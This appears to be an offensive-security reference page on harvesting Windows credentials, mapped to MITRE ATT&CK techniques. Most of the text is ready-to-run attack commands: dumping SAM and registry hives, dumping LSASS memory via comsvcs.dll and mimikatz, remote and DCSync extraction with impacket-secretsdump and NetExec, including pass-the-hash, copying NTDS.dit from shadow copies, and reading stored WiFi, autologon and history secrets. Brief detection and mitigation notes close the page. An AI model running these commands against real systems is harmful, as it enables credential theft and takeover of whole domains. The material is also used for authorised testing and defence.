Windows Credential Harvesting

Overview

Windows stores credentials in multiple locations — LSASS process memory, the SAM database, LSA secrets, NTDS.dit (on domain controllers), and cached domain credentials. Credential harvesting extracts these for offline cracking or pass-the-hash attacks. LSASS dumping and SAM extraction are the two most common techniques. On domain controllers, DCSync and NTDS.dit extraction give access to all domain hashes.

ATT&CK Mapping

• Tactic: TA0006 - Credential Access
• Technique: T1003.001 - OS Credential Dumping: LSASS Memory
• Technique: T1003.002 - OS Credential Dumping: Security Account Manager
• Technique: T1003.003 - OS Credential Dumping: NTDS
• Technique: T1003.004 - OS Credential Dumping: LSA Secrets
• Technique: T1003.006 - OS Credential Dumping: DCSync

Prerequisites

• SYSTEM or Administrator access on the target (for most techniques)
• Domain Admin or equivalent for DCSync and NTDS extraction
• SeDebugPrivilege for LSASS access

Techniques

SAM Database Extraction

The SAM (Security Account Manager) stores local user password hashes:

:: Save SAM, SYSTEM, and SECURITY hives
reg save HKLM\SAM C:\Users\Public\sam.bak
reg save HKLM\SYSTEM C:\Users\Public\system.bak
reg save HKLM\SECURITY C:\Users\Public\security.bak

# Extract hashes offline
# Impacket
# https://github.com/fortra/impacket
impacket-secretsdump -sam sam.bak -system system.bak -security security.bak LOCAL

Output format: Username:RID:LMHash:NTHash:::

LSASS Memory Dump

LSASS (Local Security Authority Subsystem Service) holds plaintext passwords, NTLM hashes, and Kerberos tickets for logged-in users:

:: Task Manager method (requires GUI)
:: Task Manager > Details > lsass.exe > Create dump file
:: Output: C:\Users\<user>\AppData\Local\Temp\lsass.DMP

:: comsvcs.dll method (command line, requires SeDebugPrivilege)
:: Find LSASS PID
tasklist /fi "imagename eq lsass.exe"
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Users\Public\lsass.dmp full

# Extract credentials from LSASS dump
# Impacket
# https://github.com/fortra/impacket
# pypykatz (Python implementation of mimikatz)
# https://github.com/skelsec/pypykatz
pypykatz lsa minidump lsass.dmp

Mimikatz

:: Mimikatz
:: https://github.com/gentilkiwi/mimikatz

:: Dump LSASS credentials (requires SeDebugPrivilege or SYSTEM)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

:: Dump SAM hashes
mimikatz.exe "privilege::debug" "lsadump::sam" "exit"

:: Dump LSA secrets
mimikatz.exe "privilege::debug" "lsadump::secrets" "exit"

:: Dump cached domain credentials (DCC2)
mimikatz.exe "privilege::debug" "lsadump::cache" "exit"

:: Export Kerberos tickets
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

Remote Credential Extraction

# Impacket secretsdump — remote credential extraction
# https://github.com/fortra/impacket
# Uses SMB to extract SAM, LSA secrets, and cached credentials remotely
impacket-secretsdump '<domain>/<user>:<password>@<target>'

# With NTLM hash (pass-the-hash)
impacket-secretsdump '<domain>/<user>@<target>' -hashes ':<NThash>'

# DCSync a single user (target must be a Domain Controller)
impacket-secretsdump '<domain>/<user>:<password>@<DC_IP>' -just-dc-user Administrator

# Output to file
impacket-secretsdump '<domain>/<user>:<password>@<target>' -outputfile creds

# NetExec — remote SAM/LSA/NTDS dump
# https://github.com/Pennyw0rth/NetExec
nxc smb <target> -u <user> -p <password> --sam
nxc smb <target> -u <user> -p <password> --lsa
nxc smb <target> -u <user> -p <password> --ntds    # Domain controller only

DCSync Attack

DCSync simulates a domain controller replication request to extract password hashes. Requires Replicating Directory Changes and Replicating Directory Changes All permissions (Domain Admin by default):

# Impacket secretsdump — DCSync
# https://github.com/fortra/impacket
# All domain hashes
impacket-secretsdump '<domain>/<user>:<password>@<DC_IP>' -just-dc

# Specific user
impacket-secretsdump '<domain>/<user>:<password>@<DC_IP>' -just-dc-user Administrator

# NTLM hashes only (skip Kerberos keys)
impacket-secretsdump '<domain>/<user>:<password>@<DC_IP>' -just-dc-ntlm

:: Mimikatz DCSync
:: https://github.com/gentilkiwi/mimikatz
mimikatz.exe "lsadump::dcsync /domain:corp.local /user:Administrator" "exit"
mimikatz.exe "lsadump::dcsync /domain:corp.local /all /csv" "exit"

NTDS.dit Extraction

NTDS.dit is the Active Directory database containing all domain hashes. It is locked while the DC is running:

:: Volume Shadow Copy method
vssadmin create shadow /for=C:
:: Copy from shadow copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Users\Public\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Users\Public\system.bak
vssadmin delete shadows /shadow={shadow_id} /quiet

:: ntdsutil method
ntdsutil "ac i ntds" "ifm" "create full C:\Users\Public\ntds_dump" quit quit

# Extract hashes from NTDS.dit offline
# Impacket
# https://github.com/fortra/impacket
impacket-secretsdump -ntds ntds.dit -system system.bak LOCAL

Credential Files

:: Saved credentials
cmdkey /list

:: WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="<SSID>" key=clear

:: Registry autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>nul | findstr /i "DefaultPassword"

:: PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

:: Unattended install files
type C:\Windows\Panther\Unattend.xml 2>nul
type C:\Windows\sysprep\sysprep.xml 2>nul

Detection Methods

Network-Based Detection

• DCSync: DRSUAPI replication traffic from non-DC hosts
• Remote secretsdump: SMB connections followed by remote registry and DRSUAPI operations

Host-Based Detection

• LSASS access events (Sysmon Event ID 10 with TargetImage lsass.exe)
• Registry hive saves (reg save HKLM\SAM)
• Volume Shadow Copy creation on domain controllers
• Mimikatz signatures (process name, module loads, specific API calls)
• Event ID 4662 with Replicating Directory Changes (DCSync indicator)

Mitigation Strategies

• Enable Credential Guard — protects LSASS from memory dumps on Windows 10/Server 2016+
• Disable WDigest — prevents plaintext password storage in LSASS memory
• Protected Users group — prevents NTLM hash storage, forces Kerberos
• LSASS protection — enable RunAsPPL (HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1)
• Limit Domain Admin usage — avoid logging into workstations with DA credentials
• Monitor DCSync attempts — alert on replication requests from non-DC machines

References

Official Documentation

• Impacket
• Mimikatz
• NetExec
• pypykatz

MITRE ATT&CK

• T1003.001 - OS Credential Dumping: LSASS Memory
• T1003.002 - OS Credential Dumping: Security Account Manager
• T1003.003 - OS Credential Dumping: NTDS
• T1003.004 - OS Credential Dumping: LSA Secrets
• T1003.006 - OS Credential Dumping: DCSync